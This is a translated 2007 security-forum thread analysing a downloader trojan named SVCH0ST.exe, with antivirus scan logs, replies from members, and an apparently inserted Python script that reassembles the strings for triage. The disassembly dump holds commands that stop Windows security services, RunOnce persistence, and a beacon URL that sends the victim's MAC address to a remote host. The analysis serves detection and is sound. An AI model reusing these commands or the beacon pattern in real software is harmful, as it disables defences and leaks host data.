[Virus Sample] A rather vicious downloader 3D0C92

promised
Posted on 2007-9-21 19:29:01
Starts automatically at boot, keeps changing its process PID, shuts down the system firewall, and is downloading trojans.
It also seems to change the IP.
Code attached:
  00407F6D PUSH SVCH0ST.00407FA4 ASCII "kernel32.dll"
  00407F7D PUSH SVCH0ST.00407FB4 ASCII "GetDiskFreeSpaceExA"
  00407FA4 ASCII "kernel32.dll",0
  00407FB4 ASCII "GetDiskFreeSpace"
  00407FC4 ASCII "ExA",0
  00408541 ASCII " *@@* $@@($*)@-$"
  00408551 ASCII "*@@$-*@@$*-@@(*$"
  00408561 ASCII ")@-*"
  00408566 ASCII "@@*-$@@*$-@@-* $"
  00408576 ASCII "@-$ *@* $-@$ *-@"
  00408586 ASCII "$ -*"
  00408CEC MOV EDX,SVCH0ST.00408D2C ASCII "0x"
  00408D2C ASCII "0x",0
  00408D70 ASCII "http://count.hdp"
  00408D80 ASCII "xzx.cn/inc/",0
  00408E68 PUSH SVCH0ST.00408EC4 ASCII "SeRestorePrivilege"
  00408EC4 ASCII "SeRestorePrivile"
  00408ED4 ASCII "ge",0
  00409009 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  0040901C MOV EDX,SVCH0ST.00409160 ASCII "HIV"
  00409034 PUSH SVCH0ST.00409164 ASCII "SOFTWARE"
  00409047 PUSH SVCH0ST.00409170 ASCII "Microsoft"
  00409059 PUSH SVCH0ST.0040917C ASCII "Windows"
  0040906B PUSH SVCH0ST.00409184 ASCII "CurrentVersion"
  0040907D PUSH SVCH0ST.00409194 ASCII "RunOnce"
  004090A9 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  004090E4 MOV EDX,SVCH0ST.00409150 ASCII "\haojing.hiv"
  00409150 ASCII "\haojing.hiv",0
  00409160 ASCII "HIV",0
  00409164 ASCII "SOFTWARE",0
  00409170 ASCII "Microsoft",0
  0040917C ASCII "Windows",0
  00409184 ASCII "CurrentVersion",0
  00409194 ASCII "RunOnce",0
  004091D6 MOV EAX,SVCH0ST.0040920C ASCII "No computer name"
  0040920C ASCII "No computer "
  0040921C ASCII "name",0
  0040929D MOV EDX,SVCH0ST.00409488 ASCII "00-00-00-00-00-00"
  004092D9 MOV EDX,SVCH0ST.004094A4 ASCII "\"
  004092EB MOV EDX,SVCH0ST.004094A4 ASCII "\"
  004092FF PUSH SVCH0ST.004094A8 ASCII "NETAPI32.DLL"
  00409316 PUSH SVCH0ST.004094B8 ASCII "NetWkstaTransportEnum"
  00409326 PUSH SVCH0ST.004094D0 ASCII "NetApiBufferFree"
  0040939F MOV EAX,SVCH0ST.004094EC ASCII "TCPIP"
  00409488 ASCII "00-00-00-00-00-0"
  00409498 ASCII "0",0
  004094A4 ASCII "\",0
  004094A8 ASCII "NETAPI32.DLL",0
  004094B8 ASCII "NetWkstaTranspor"
  004094C8 ASCII "tEnum",0
  004094D0 ASCII "NetApiBufferFree"
  004094E0 ASCII 0
  004094EC ASCII "TCPIP",0
  0040950D PUSH SVCH0ST.00409578 ASCII "Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE"
  0040955C MOV EDX,SVCH0ST.004095C8 ASCII "C:\Program Files\Internet Explorer\IEXPLORE.EXE"
  00409578 ASCII "Software\Microso"
  00409588 ASCII "ft\Windows\Curre"
  00409598 ASCII "ntVersion\App Pa"
  004095A8 ASCII "ths\IEXPLORE.EXE"
  004095B8 ASCII 0
  004095C8 ASCII "C:\Program Files"
  004095D8 ASCII "\Internet Explor"
  004095E8 ASCII "er\IEXPLORE.EXE",0
  0040962F MOV EDX,SVCH0ST.00409678 ASCII "cmd /c "
  00409678 ASCII "cmd /c ",0
  004096BE MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  004096ED MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  0040972F MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  0040975E MOV EDX,SVCH0ST.004097A4 ASCII "\SVCH0ST.exe"
  004097A4 ASCII "\SVCH0ST.exe",0
  004097D7 PUSH SVCH0ST.00409BDC ASCII "net stop wscsvc"
  004097E3 PUSH SVCH0ST.00409BEC ASCII "net stop sharedaccess"
  00409894 PUSH SVCH0ST.00409C14 ASCII " http://count.hdpxzx.cn/count.jsp?id="
  0040989F PUSH SVCH0ST.00409C44 ASCII "&mac="
  004098AA PUSH SVCH0ST.00409C54 ASCII "&te="
  004098B5 PUSH SVCH0ST.00409C64 ASCII "&fc=fc"
  004098E5 PUSH SVCH0ST.00409C74 ASCII "fc"
  004098FA PUSH SVCH0ST.00409C80 ASCII ".txt"
  00409914 PUSH SVCH0ST.00409C74 ASCII "fc"
  00409929 PUSH SVCH0ST.00409C80 ASCII ".txt"
  00409A31 MOV EDX,SVCH0ST.00409C9C ASCII "[downfile]"
  00409A49 MOV EDX,SVCH0ST.00409CB0 ASCII "[openurl]"
  00409AEE PUSH SVCH0ST.00409CC4 ASCII "\KB"
  00409AF9 PUSH SVCH0ST.00409CD0 ASCII ".log"
  00409BDC ASCII "net stop wscsvc",0
  00409BEC ASCII "net stop shareda"
  00409BFC ASCII "ccess",0
  00409C14 ASCII " http://count.hd"
  00409C24 ASCII "pxzx.cn/count.js"
  00409C34 ASCII "p?id=",0
  00409C44 ASCII "&mac=",0
  00409C54 ASCII "&te=",0
  00409C64 ASCII "&fc=fc",0
  00409C74 ASCII "fc",0
  00409C80 ASCII ".txt",0
  00409C90 ASCII "",0
  00409C9C ASCII "[downfile]",0
  00409CB0 ASCII "[openurl]",0
  00409CC4 ASCII "\KB",0
  00409CD0 ASCII ".log",0
  00409CE0 ASCII " ",0
  00409DDF PUSH 0FF (初始 CPU 选择)
  00409E08 MOV ECX,SVCH0ST.00409E70 ASCII "\SVCH0ST.exe"
  00409E70 ASCII "\SVCH0ST.exe",0

[ Last edited by promised on 2007-9-21 19:31 ]
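The OllyDbg listing above shows every string split into 16-byte chunks, so the persistence key, the service-stop commands and the beacon URL only become readable once the chunks are joined. The following Python is an added example (not code from the post or from the sample) that reassembles such a listing and buckets the results into defender-relevant indicator classes; DUMP is a constructed excerpt of the listing quoted above, and the category names are my own.

```python
import re

# Constructed excerpt of the OllyDbg listing in the post above; only ADDR ASCII
# data lines are parsed, the PUSH/MOV cross-reference lines are skipped.
DUMP = r"""
00408E68 PUSH SVCH0ST.00408EC4 ASCII "SeRestorePrivilege"
00408EC4 ASCII "SeRestorePrivile"
00408ED4 ASCII "ge",0
00409150 ASCII "\haojing.hiv",0
00409194 ASCII "RunOnce",0
004094D0 ASCII "NetApiBufferFree"
004094E0 ASCII 0
00409BEC ASCII "net stop shareda"
00409BFC ASCII "ccess",0
00409C14 ASCII " http://count.hd"
00409C24 ASCII "pxzx.cn/count.js"
00409C34 ASCII "p?id=",0
"""
DEF_RE = re.compile(r'^([0-9A-F]{8})\s+ASCII\s+(?:"(.*)"(,0)?|0)\s*$')

def reassemble(dump):
    """Join OllyDbg's 16-byte chunks into (start_address, whole_string) pairs.
    ',0' (or a bare 'ASCII 0') ends a string; a chunk continues only if contiguous."""
    out, start, buf, expect = [], None, "", None
    for m in filter(None, map(DEF_RE.match, dump.splitlines())):
        addr, chunk = int(m.group(1), 16), m.group(2) or ""
        terminated = m.group(2) is None or m.group(3) is not None
        if start is not None and addr != expect:  # address gap: flush partial
            out.append((start, buf))
            start, buf = None, ""
        start = addr if start is None else start
        buf += chunk
        expect = addr + len(chunk)
        if terminated:
            if buf:                               # skip empty "",0 entries
                out.append((start, buf))
            start, buf = None, ""
    if start is not None:                         # dump ended mid-string
        out.append((start, buf))
    return out

def triage(dump):
    # Bucket the reassembled strings into indicator classes for a triage report.
    cats = {"persistence": r"RunOnce|\.hiv$", "defense_evasion": r"^net stop ",
            "network": r"https?://", "privilege": r"^Se\w+Privilege$"}
    found = {k: [] for k in cats}
    for _, s in reassemble(dump):
        for name, pat in cats.items():
            if re.search(pat, s.strip()):
                found[name].append(s.strip())
    return found
```

Running `triage` over the full listing from the post yields the RunOnce persistence path, both `net stop` commands and the `count.jsp` beacon in one pass, which is the set of indicators a detection rule or a host sweep would key on.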

FBAV
Posted on 2007-9-21 19:29:53
MicroVita AntiSpyware 100 C
_____________________________________________

             风暴微塔反间谍
[强力查杀各种Win32位的病毒,木马,蠕虫,恶意软件]
                   http://221.10.254.214/
----------------------------------------------
开始扫描……

正在检查启动……
[C:\Documents and Settings\Administrator\桌面\virus\SVCH0ST\SVCH0ST.exe]
                    …………发现Spy!报告: [4]
文件信息:  大小:57344  MD5:3d0c92870bfaf1783f1a540a31aca4fe

文件数:1   病毒数:1  比重:1
OK  扫描完毕!
  ***日志解释
[4] 集中有害分析引擎
[3] 全局系统判断引擎
[2] 文件特征码引擎
[1] 文件启发式引擎
风野胤
Posted on 2007-9-21 19:32:19
Scanning Log
NOD32 version 2543 (20070921) NT
Command line: R:\SVCH0ST.rar
Checking CRC of NOD32.EXE: Status OK
Scanning memory: Not performed (option disabled)
Error occurred while scanning MBR sector of the 2. physical disk. Error reading sector.
Date: 21.9.2007  Time: 19:31:31
Anti-Stealth technology is enabled.
Scanned disks, folders and files: R:\SVCH0ST.rar
R:\SVCH0ST.rar »RAR »SVCH0ST.exe - probably unknown NewHeur_PE virus [7]
Number of scanned files: 1
Number of threats found: 1
Time of completion: 19:31:32 Total scanning time: 1 sec (00:00:01)
Notes:
[7] File is probably infected with an unknown virus.

PS: Posting the source code isn't a good idea, is it?
aziok
Posted on 2007-9-21 19:33:03
Begin scan in  \桌面\SVCH0ST.rar
  [0] Archive type: RAR
  --> SVCH0ST.exe
      [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
promised
OP | Posted on 2007-9-21 19:33:43

Reply to post #3 by 风野胤

This isn't source code;
it's a disassembly.
FBAV
Posted on 2007-9-21 19:34:18
Originally posted by 风野胤 on 2007-9-21 19:32
Scanning Log
NOD32 version 2543 (20070921) NT
Command line: R:\SVCH0ST.rar
Checking CRC of NOD32.EXE: Status OK
Scanning memory: Not performed (option disabled)
Error occurred while scanning MBR  ...

This is a disassembly.
Anyone who knows how can do it:
unpack, then disassemble.
xffsfy
Posted on 2007-9-21 19:34:44
BD...

风野胤
Posted on 2007-9-21 19:35:22
I've only just started learning a programming language.
Haven't learned assembly yet.
That's still a long way off.
scottxzt
Posted on 2007-9-21 19:37:42

solcroft
Posted on 2007-9-21 19:42:06

Copyright © KaFan  KaFan.cn All Rights Reserved.
